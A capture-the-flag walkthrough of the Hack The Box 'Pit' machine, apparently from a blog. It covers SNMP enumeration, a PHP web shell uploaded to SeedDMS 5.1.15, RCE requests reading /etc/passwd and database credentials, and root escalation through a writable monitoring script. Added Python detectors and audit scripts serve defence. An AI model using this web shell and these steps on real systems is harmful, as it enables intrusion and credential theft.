HTB Walkthrough : Pit

Today we have another challenge from Hack The Box called "Pit". This lab is based on exploitation of SeedDMS, a free document management system with an easy-to-use web-based user interface for small and medium-sized enterprises. It is based on PHP and MySQL or SQLite3 and runs on Linux, macOS and Windows.

Level : Medium

Attacking Strategy

  • Network Scanning
    • Masscan
    • Nmap
  • Enumeration
    • SNMP service
    • User enumeration using the SNMP service
  • Exploitation
    • SeedDMS 5.1.15 (CVE-2019-12744)
  • Privilege Escalation
    • Script not properly configured

Walkthrough

IP Address : 10.10.10.241

We start with Masscan to identify the open ports on the target server. Masscan is an open-source port scanner.

sudo masscan -p1-65535,U:1-65535 10.10.10.241 --rate=1000 -e tun0 

The Masscan result shows one open UDP port, 161, which is used by SNMP by default. SNMP stands for Simple Network Management Protocol; it is an Internet Standard protocol for collecting and organizing information about managed devices on IP networks and for modifying that information to change device behaviour. On the TCP side we also get services on ports 22, 80 and 9090. We pass the result to nmap to get more information on the services.

nmap -p22,80,9090 -sC -sV -oN nmap 10.10.10.241 
Nmap scan report for 10.10.10.241
Host is up (0.10s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-server-header: nginx/1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1

UDP Scan

sudo nmap -sU -p161 -sC -sV -oN nmap 10.10.10.241
Nmap scan report for 10.10.10.241
Host is up (0.096s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 4ca7e41263c5985e00000000
|   snmpEngineBoots: 73
|_  snmpEngineTime: 1d12h26m49s
| snmp-processes: 
|   1: 
|     Name: systemd
|   2: 
|     Name: kthreadd
|   3: 
|     Name: rcu_gp
|   4: 
|     Name: rcu_par_gp
|   6: 
|     Name: kworker/0:0H-events_highpri
|   9: 
|     Name: mm_percpu_wq
|.......
| snmp-sysdescr: Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
|_  System uptime: 1d12h26m49.02s (13120902 timeticks)
Service Info: Host: pit.htb

From the nmap result we get more information about the services running on the target; the TLS certificate on port 9090 also reveals another subdomain, dms-pit.htb. After nmap we start enumerating the SNMP service, beginning with the snmp-check tool.

snmp-check 10.10.10.241
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.10.241:161 using SNMPv1 and community 'public'

[*] System information:

  Host IP address               : 10.10.10.241
  Hostname                      : pit.htb
  Description                   : Linux pit.htb 4.18.0-305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC 2021 x86_64
  Contact                       : Root <[email protected]> (configure /etc/snmp/snmp.local.conf)
  Location                      : Unknown (edit /etc/snmp/snmpd.conf)
  Uptime snmp                   : 1 day, 12:40:42.34
  Uptime system                 : 1 day, 12:40:10.90
  System date                   : -

snmp-check is an open source tool preinstalled on Kali. The result shows that we can enumerate with the "public" community string. In SNMP, the community string is like a user ID or password that allows access to a router's or other device's statistics. A manager such as IPCheck Server Monitor sends the community string along with every SNMP request; if the community string is correct, the device responds with the requested information.

For more in-depth enumeration we use a different tool, which is available on GitHub.

git clone https://github.com/dheiland-r7/snmp
cd snmp 
sudo apt-get install snmp
sudo cpan -i NetAddr::IP
./snmpbw.pl pit.htb public 2 1

After running the script we get the log files; reading them, we find something useful: SeedDMS is present on the server, along with some binary information, and the script also reveals some usernames.

Now we know a username, but where can we use it? We also discovered services on ports 80 and 9090. Port 80 serves the default landing page of the nginx server.

When we visit port 9090 there is a login portal. After searching the internet and reading some blogs, it turns out to be a web GUI that lets an administrator control the server through a web application.

Here we try some default credentials like admin:admin and admin:password; after trying some combinations we also try "michelle:michelle", but without success. After some more enumeration we visit the subdomain and try to reach SeedDMS there.

http://dms-pit.htb/seeddms51x/seeddms 

Here we get a login portal; when we try "michelle:michelle" we are in, and we see some announcements from the administrator.

There is a message from the administrator that SeedDMS has been upgraded to 5.1.15. After some googling we find that SeedDMS is vulnerable to remote code execution; more details are on Exploit-DB. The exploit shows the steps to abuse this vulnerability: add a document and upload the payload.

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

After successfully uploading the payload, note down the document ID; in our case it is 30.

Once the payload is uploaded we can access it by visiting the URL below. For more, read the exploit on Exploit-DB.

http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat+/etc/passwd

Now that we have RCE on the server we collect some information, and after a while we are able to dump the config file, which contains the database credentials in plain text.

http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=ls%20/var/www/html/seeddms51x/conf/
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=cat%20/var/www/html/seeddms51x/conf/settings.xml
<!--
       - dbDriver: DB-Driver used by adodb (see adodb-readme)
       - dbHostname: DB-Server
       - dbDatabase: database where the tables for seeddms are stored (optional - see adodb-readme)
       - dbUser: username for database-access
       - dbPass: password for database-access
-->    
    <database dbDriver="mysql" dbHostname="localhost" dbDatabase="seeddms" dbUser="seeddms" dbPass="ied^ieY6xoquu" doNotCheckVersion="false">
    </database>
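As an added defender-side example (not from the original post), here is a small Python detector that flags requests like the two URLs above in nginx access logs: a script extension served from SeedDMS's data/<folder>/<document id>/ tree, with a cmd parameter raising the finding to high severity. The log lines are constructed samples modelled on the walkthrough, not the box's real logs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed nginx access-log lines (combined format) modelled on the
# requests in the walkthrough; they are samples, not the box's real logs.
SAMPLE_LOG = """\
10.10.14.5 - - [20/Jul/2021:17:30:01 +0000] "GET /seeddms51x/seeddms/out/out.ViewFolder.php?folderid=1 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.5 - - [20/Jul/2021:17:31:12 +0000] "GET /seeddms51x/data/1048576/30/1.php?cmd=cat+/etc/passwd HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.10.14.5 - - [20/Jul/2021:17:32:40 +0000] "GET /seeddms51x/data/1048576/29/1.php?cmd=cat%20/var/www/html/seeddms51x/conf/settings.xml HTTP/1.1" 200 3400 "-" "curl/7.74.0"
10.10.14.9 - - [20/Jul/2021:17:33:05 +0000] "GET /seeddms51x/data/1048576/12/1.pdf HTTP/1.1" 200 90210 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# SeedDMS keeps uploads as data/<folder>/<document id>/<version>.<ext>. A file
# with a script extension in that tree is the upload-to-RCE pattern above.
DATA_PATH_RE = re.compile(
    r'^/seeddms51x/data/\d+/(?P<doc>\d+)/\d+\.(?P<ext>php\d?|phtml|phar)$', re.I
)


def classify(line):
    """Return a finding dict for a suspicious request, or None for benign lines."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a parseable access-log line
    parts = urlsplit(m.group("target"))
    p = DATA_PATH_RE.match(parts.path)
    if not p:
        return None  # not a script under the data tree
    # parse_qs already decodes '+' and %20, so the command comes back as typed
    cmd = parse_qs(parts.query).get("cmd", [None])[0]
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "doc_id": int(p.group("doc")),
        "cmd": cmd,
        # a script in the data tree is suspicious on its own; a cmd= parameter
        # means it is being driven as a web shell
        "severity": "high" if cmd else "medium",
    }


def scan(log_text):
    """Run classify() over every line and keep only the findings."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same rule can be fed to a SIEM as a regex on the request path; the document ID in the match tells you which upload to pull from the data tree for triage.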

From settings.xml we get a username and password, so now we have two usernames, dbUser (seeddms) and michelle, and the password "ied^ieY6xoquu". Now we can log in on port 9090 with the valid credentials "michelle:ied^ieY6xoquu"; after a successful login to the portal we have terminal access to the server.

Privilege Escalation

Now that we have initial access to the server it is time to get root, so we enumerate further and look for anything like config files, password files, etc.; at the same time we check sudoers, SUID binaries, etc., but nothing turns up.

From the SNMP result we know a monitoring script exists, so we start with that. It is an executable bash script which simply runs the files under /usr/local/monitoring.

To exploit this we simply create a bash script named check.sh under /usr/local/monitoring/ that sets up password-less SSH login to the server. For more, read here.

Once check.sh is placed under /usr/local/monitoring we need to trigger the script by making an SNMP request.

sudo apt-get install snmp-mibs-downloader
snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects
ssh -i id_rsa [email protected]

If everything is good, simply make an SSH login as the root user using the private key and collect the flags.
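As an added hardening check (not part of the original post), the Python below audits the kind of misconfiguration abused in this privilege escalation: it parses the extend directives from an snmpd.conf and reports any path component, along the script snmpd runs as root and the directory that script executes from, that a non-root user could modify. The snmpd.conf fragment, the /usr/bin/monitor path and the permission table are constructed assumptions, not taken from the box.

```python
import os
import stat
# Constructed (uid, gid, mode) table standing in for the box's filesystem; the
# one assumed defect is /usr/local/monitoring being writable by a non-root group.
FAKE_FS = {
    "/": (0, 0, 0o755), "/usr": (0, 0, 0o755), "/usr/bin": (0, 0, 0o755),
    "/usr/local": (0, 0, 0o755), "/usr/bin/monitor": (0, 0, 0o755),  # assumed target
    "/usr/local/monitoring": (0, 1000, 0o2775),  # root:<gid 1000>, group-writable
}
# Assumed snmpd.conf fragment; real syntax is 'extend [OID] NAME PROG [ARGS]'.
SAMPLE_SNMPD_CONF = "# monitoring hook\nextend monitoring /usr/bin/monitor\n"

def parse_extend_lines(conf_text):
    """Return the program paths named by extend / extend-sh directives."""
    paths = []
    for raw in conf_text.splitlines():
        tok = raw.split("#", 1)[0].split()
        if not tok or tok[0] not in ("extend", "extend-sh"):
            continue
        args = tok[1:]
        if args and args[0].startswith("."):  # optional explicit MIB OID
            args = args[1:]
        if len(args) >= 2:
            paths.append(args[1])
    return paths

def ancestors(path):
    """Yield path and every parent directory up to '/'."""
    while True:
        yield path
        if path == "/":
            return
        path = os.path.dirname(path) or "/"

def audit_root_executed_paths(paths, lookup):
    """For each path snmpd executes as root (or reads scripts from), report every
    component that is not root-owned or is group/other writable.
    lookup(path) -> (uid, gid, mode); on a live host use os.stat fields."""
    findings = []
    for p in paths:
        for comp in ancestors(p):
            uid, gid, mode = lookup(comp)
            if uid != 0:
                findings.append((comp, "not owned by root (uid %d)" % uid))
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((comp, "writable by group/other (%s)" % oct(mode & 0o7777)))
    return findings

if __name__ == "__main__":
    targets = parse_extend_lines(SAMPLE_SNMPD_CONF) + ["/usr/local/monitoring"]
    print(audit_root_executed_paths(targets, lambda p: FAKE_FS[p]))
```

On a live host pass a lookup that returns (st.st_uid, st.st_gid, st.st_mode) from os.stat, and include the directory the extend script executes from as well as the script itself, since a clean script that runs whatever it finds in a writable directory is exactly the hole used above.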
